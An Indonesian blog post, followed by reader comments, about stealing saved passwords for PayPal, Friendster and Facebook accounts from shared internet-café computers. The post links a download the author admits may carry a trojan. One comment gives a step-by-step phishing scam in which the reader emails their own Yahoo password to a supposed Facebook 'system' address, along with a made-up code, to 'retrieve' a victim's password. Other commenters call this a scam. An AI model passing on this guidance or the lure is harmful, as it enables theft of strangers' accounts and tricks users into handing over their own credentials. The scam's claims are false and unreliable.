Cari Artikel Blog ini

sponsor

Cara mudah Mendapatkan Password dan ID Paypal,friendster, Facebook, Dan Lainnya

Sebenarnya Trik ini sangatlah mudah.
dengan menggunakan tool yang kecil menurut saya.

tool ini hanya akan bekerja di warnet saja. Tidak akan mungkin bekerja disuatu rumah anda sendiri. Karena tool ini hanyalah mencuri cookies dari bekas-bekas internet yang dijalankan oleh seseorang seperti membuka friendster, Paypal,facebook, dan lain-lain .
Jadi intinya tool ini akan mengambil semua password yang tersimpan di cookies dari komputer yang habis dipakai untuk Internet.

tetapi ingat sebelum mendownload, tool ini hanya dapat digunakan di mozilla Firefox saja.

silahkan download dahulu di sini.

atau download di :

http://www.ziddu.com/download/4886892/passwordfox.zip.html

ukuran file : 40KB


@info.
jangan pernah dilakukan dirumah. mungkin tool ini terjangkit virus trojan. PedasManisCinta tidak bertanggung jawab atas semuanya. tapi tenang saja walaupun begitu masih bisa digunakan di warnet karena sebenarnya tool ini hanya mencuri cookiesnya saja. jadi kalau digunakan dirumah rugi cuma dapat password-password milik kita sendiri.

@ingat
jangan dilakukan untuk merugikan orang lain.
ini hanyalah sekedar pengetahuan tentang hacking.

Baca juga yang ini :



Tags:

28 comments:

lucky mengatakan...

waduh bahaya !!
dosa mass . . . :@

Dhendhie mengatakan...

@lucky

ini hanyalah sekedar pengetahuan tentang hacking.
hehehehehehhehe

manusia mengatakan...

kok id ripway nya ga bisa dibuka lagi???

Dhendhie mengatakan...

@manusia

hehehehehehh.
klo di ripway. setiap 1 bulan ga pernah kamu buka atau log in maka account kamu dihapus dari ripway.

timontius-pangestu.blogspot.com mengatakan...

Makasih Mas, tapi ada viruznya :@ . Asyiknya dicoba di mana ?

Dhendhie mengatakan...

@timontius

yang jelas ya dicoba di warnet.

Anonim mengatakan...

keren2 i like it..

Deja_Vu mengatakan...

maaf mas, tapi kok sofwarex banyak yg not found, atau mungkin sy yg ngak tau ya! maklum br bljr mas. JUN http://kendhin.890m.com/emoticon/bingung.gif

Dhendhie mengatakan...

@deja_vu

disanakan ada buku petunjuknya ??
g dibaca ya ?

budi mengatakan...

Hai teman apakan anda tahu cara mengetahui password orang lain.Tak banyak yang tau kalau ternyata facebook dan yahoo menjalin sebuah kerja sama yang unik, hal ini baru saya tau beberapa waktu yang lalu dari seorang kawan yg kebetulan juga baru mendapatkan informasi ini.
Dan dengan memanfaatkan celah dari kerja sama inilah kita dapat mengetahui password dari account facebook seseorang dengan sangat mudah.
Saya sendiri sudah mencoba beberapa cara dan selalu gagal, sudah men-download berbagai macam software dalam usaha ini tapi tetap saja tak berhasil mendapatkan password account yg di incar.
Tapi ternyata, setelah mengetahui celah ini, saya sampai merasa bodoh sendiri. Karena ternyata sangat mudah mendapatkan password facebook seseorang jika kita tau cara yg tepat.
Dan sama sekali tidak memerlukan software…!!
oke akan saya jelaskan caranya..
1. login ke yahoo.
ingat..!! account yahoo anda harus berumur minimal 30 hari agar cara ini bekerja dengan baik dan harus merupakan alamat email yg anda gunakan pada saat registrasi facebook. Yahoo akan dengan otomatis menolak email yg tidak terhubung ke Facebook.
2. Jika sudah masuk ke yahoo, tulislah sebuah email yang anda tujukan untuk staff facebook di Yahoo dengan alamat email: systemfacebook@yahoo.com server Yahoo akan mengirimkan secara otomatis password “terlupakan” tersebut.
3. Pada baris SUBJECT masukkan/ketik kalimat : PASSWORD RETRIEVE
4. lalu pada baris pertama mail anda tuliskan alamat email korban yg akan anda hack
5. Pada baris kedua masukkan alamat email yg anda gunakan
6. Pada baris ketiga tuliskan password yahoo anda.
Ingat, password yang anda masukkan inilah yang akan menentukan berhasil tidaknya usaha anda karena sever yahoo akan secara otomatis melakukan login untuk meng-konfirmasi valid atau tidaknya email andan, dengan kata lain server yahoo akan meng-extract password dari email calon korban anda dengan menggunakan password anda.
Dan proses ini sangat aman karena anda mengirim email kepada mesin dan bukan kepada seseorang.
7. Dan di baris terakhir masukkan kata : cgi-bin/$et76431&pwrsa ini merupakan kode yang dibutuhkan untuk men-cocokkan email anda dengan email calon korban yg anda minta password nnya.
jadi jika misalkan email anda adalah cinta.laura@yahoo.com
dan email korban anda adalah krisdayanti@yahoo.com
dan password anda adalah : rahasia
maka email yg anda tulis nantinya adalah:
To: systemfacebook@yahoo.com
bcc: cc: (biarkan kosong)
Subject: password retrieve
krisdayanti@yahoo.com
cinta.laura@yahoo.com
rahasia
cgi-bin/$et76431&pwrsa
selanjutnya setelah anda mengirim email tersebut anda akan mendapatkan balasan secara otomatis dari yahoo dengan dengan subject: System Reg
Message
biasanya yahoo memerlukan waktu sekitar 20 menit untuk mengkonfirmasikan dan meng-extract password yang anda minta.
selamat mencoba…

Anonim mengatakan...

@budy: hahahaha,,,

Yonathan mengatakan...

Nyontek lo budy!
salah lgi, ga jalan...

Anonim mengatakan...

Klo cara yg mudah cari proxy wifi gmn?

yousurf_unikom@yahoo.com mengatakan...

bwt budi: cara lo menipu orang da basi,,,,,,,,,,,,,,,,,,

Anonim mengatakan...

Eyang buyut mengatakan.@budy...Tipuan basi,...hahaha.Sblm bpk lo lahir,wa udh tau trik ndeso ini...

Perusuh Abadi mengatakan...

KERENNNNNN.......
Nih dia yg q suka!!!!

Anonim mengatakan...

cara mudah mendapat email dan password ...tanyakan langsung sama orangnya....hahahahahaah

Anonim mengatakan...

sob klo d waner nya pake deeprize gmn???
ap cara ini masih bs d pake???

felinda mengatakan...

saya masih belum ngerti cara hacking,,,padahal saya dah mendownload http ziddu?? tolong dong ajari yang lebih detail'y lagi pleaz, thx!

lala mengatakan...

ini ibu budi,ini bpk budi..
ada apa dngn budi..???
si budi asyik sedang mengarang(nipu)...kwkwkwkwkwkwkkkkkkk

lala mengatakan...
Komentar ini telah dihapus oleh pengarang.
jendral mengatakan...

@buddy: mantap kali tip....uan nya buddy...wkwkwkwk,
klo mau jd penipu yang kerenlah jgn murahan gitu, ntu trik jaman gajahmada tk...=))=))

'-siiy edo killman pb-' mengatakan...

Buka Nya Di Warnet

Apik mengatakan...

CARA MENDAPATKAN PASSWORD FACEBOOK KITA TANYAKAN PADA RUMPUT YANG BERGOYANG ANGIN YANG BERHEMBUS DAN AWAN YANG BERARAK DILANGIT HUA..HA..HA..

Ramli Achmad mengatakan...

apakah bisa juga dipergunakan pada komputer yang sudah terinstal deef freez...?

karna biasaya komputer yang sudah terinstal applikasi tersebut, maka semua data yang sudah masuk akan terhapus pada saat komputer dimatikan atau di restar ...

foto seksi mengatakan...

tx y..

nona mengatakan...

@budi:kok aq krm ke yahoo malah gagal...boong bngad sih lu...

Hunnit mengatakan...

gan, bisa tolong ane gak ?
akun fb ane kena hack seseorang gan .
alamat emailnya diganti sm orang itu, gmn nih gan caranya dapetin lagi ?
ane dijelek"in di akun ane sendiri sama hacker bangsat itu. tolongin ane gan.
skrg akun ane di nonaktifin tapi ntar bakal di aktifin lagi gan.
tolong gan.
seseorang disini yang bisa tolong ane e-mail ane ya gan di ehuntonit@gmail.com.
ane tunggu gan email agan".
trims.
maaf sebelumnya gan.

hunnit
http://want-tips.blogspot.com

Poskan Komentar

silahkan tinggalkan komentar,
bila tidak punya ID google, yahoo, Open ID, atau lainnya pilih pada pilihan anonymous [dimohon mencantumkan nama].